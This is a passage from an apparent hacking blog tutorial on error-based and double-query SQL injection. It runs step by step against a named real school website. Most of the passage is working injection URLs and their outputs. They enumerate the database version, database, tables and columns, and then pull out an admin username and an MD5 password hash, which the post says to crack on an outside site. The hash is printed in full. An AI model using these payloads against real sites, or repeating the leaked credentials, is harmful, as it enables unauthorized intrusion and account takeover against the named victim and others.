4. LIMIT N,1: LIMIT Function and N where N is a random integer

Now lets do some replacing, FOCUS





Code:



COLUMN_NAME replace with "userName" and "passWord"
Databasename replace with "iqbal_iqbal"
TABLENAME replace with "settings"



After you're done with altering the code to your needs of extracting information, time to execute it

Here's what the code will look like:





Code:



http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)



Results:





Code:



Duplicate entry 'admin~86f574c1d63d53fa804c13c3213953d9~1' for key



[Image: PTqli.png]

SUCCESS, you injected the site with error based now you have the login info

Username: admin

Password: 86f574c1d63d53fa804c13c3213953d9

Go to http://www.md5decrypter.co.uk/ to crack that MD5 Hash







Now Lets Start with DOUBLE Query SQL Injection

So basically, as stated above, DOUBLE Query is the same like Error Based except the query we'll enter is gonna be double the normal error based query

First off, the definition so that you can understand:





Code:



Double query SQL injection is a vulnerability that uses two queries together wrapped into one that confuses the db to a point where it spits out an error. This error gives us the info we need to leverage the database all the way to the admin panel. As a matter of fact we can pretty much dump the whole database if we want.





Differences:

Error Based Query for Database Extraction:





Code:



and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)





Double Query for Database Extraction:





Code:



and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1





Now you get the idea, lets cut to the chase and go on

We'll be using the same site as above







Step1: Getting the database version

Alright same as Error Based, here's the Double query:





Code:



and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1





So our Address will look like this:





Code:



http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1





NOTE(IMPORTANT): Make sure that your queries are very well organized when you execute them, otherwise the browser will return the results as an error.



Results after query execution:





Code:



Duplicate entry '~'5.1.56-log'~1' for key 'group_key



Database version is 5

You can test on the site now if you want so that you won't get confused







Step2: Getting the Database

Now we've got the version, lets execute a double query on extracting the database

Query for Database extraction:





Code:



and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1



Notice the LIMIT Function again and make sure you don't make mistakes in that

It shows that

Limit N,1 where N is a random integer. Example: Limit 0,1



Here's what our address will then look like:





Code:



http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1



Once more, don't forget about the LIMIT Function



So here's the results:





Code:



iqbal_iqbal



Now that's their database.

Note it down on a notepad or a paper







Step3: Getting the Table Names

As I've explained above, we'll be also using the LIMIT Function in this query.

Just a quick look, the query will look like this:





Code:



and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where
table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1





Alright you need to focus on the code and see the changes.

There are two variables here:

1. Hex_code_databasename

2. LIMIT Function



Obviously, we need to Hex the database name we've just taken into record and add 0x in the beginning i.e. Database= 0xiqbal_iqbal

To convert your database name into hex: http://www.swingnote.com/tools/texttohex.php

Now that you've the database into hex, lets see what our address will look like:





Code:



http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0x697162616c5f697162616c LIMIT 19,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1





LIMIT 19,1 brings us the valuable table which is "settings"

Review the code and study it







Step4: Getting Column names from specific Tables and Database

Now that we know what we need which are the table (settings) and database (iqbal_iqbal), lets proceed to the next step; column extraction

Here's what the query will look like:





Code:



and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where
table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name LIMIT N,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1



Now here we have 3 variables:

1. Hex code of Databasename: Hex the database which in our case is (iqbal_iqbal)

2. Hex code of tablename: Hex the table name which is "settings"

3. LIMIT Function

Alright, I'm pretty sure you know what you have to do exactly so I don't need to explain everything again and again.



Here's what the address is gonna look like:





Code:



http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x697162616c5f697162616c AND table_name=0x73657474696e6773 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1



Notice the hexed variables and the LIMIT Function

Keep incrementing the LIMIT until you find the valuable columns which in our case is "userName" and "passWord"

Review what we have just done for less confusion







Step5: Getting the Data from the Columns with the help of Table name and Database name

Alright now that we know what we need to extract, lets get our goods

As far as what we're injected in the site, this is our information:

database name: iqbal_iqbal

table name: settings

column names: userName, passWord



Here's what the query will look like first (for extracting data):





Code:



and(select 1 from(select count(*),concat((select (select
(SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1





Variables:

table_name.column_name: Input the table name and column name you want to extract information from



database_name.table_name: Input the database name and table name you want to extract information from



LIMIT Function: Increment until you find the data you need



So here's what our address is gonna look like when we extract details from userName





Code:



http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.userName as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1



Output:





Code:



admim





Query for extracting details from passWord





Code:



http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.passWord as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1



Output:





Code:



86f574c1d63d53fa804c13c3213953d9





Username: admin

Password: 86f574c1d63d53fa804c13c3213953d9



Alright I think that's pretty much what you have to know about Error Based/Double Query SQL injection.









Posted by



at





No comments:
  


































        

      









Subscribe to:
Posts (Atom)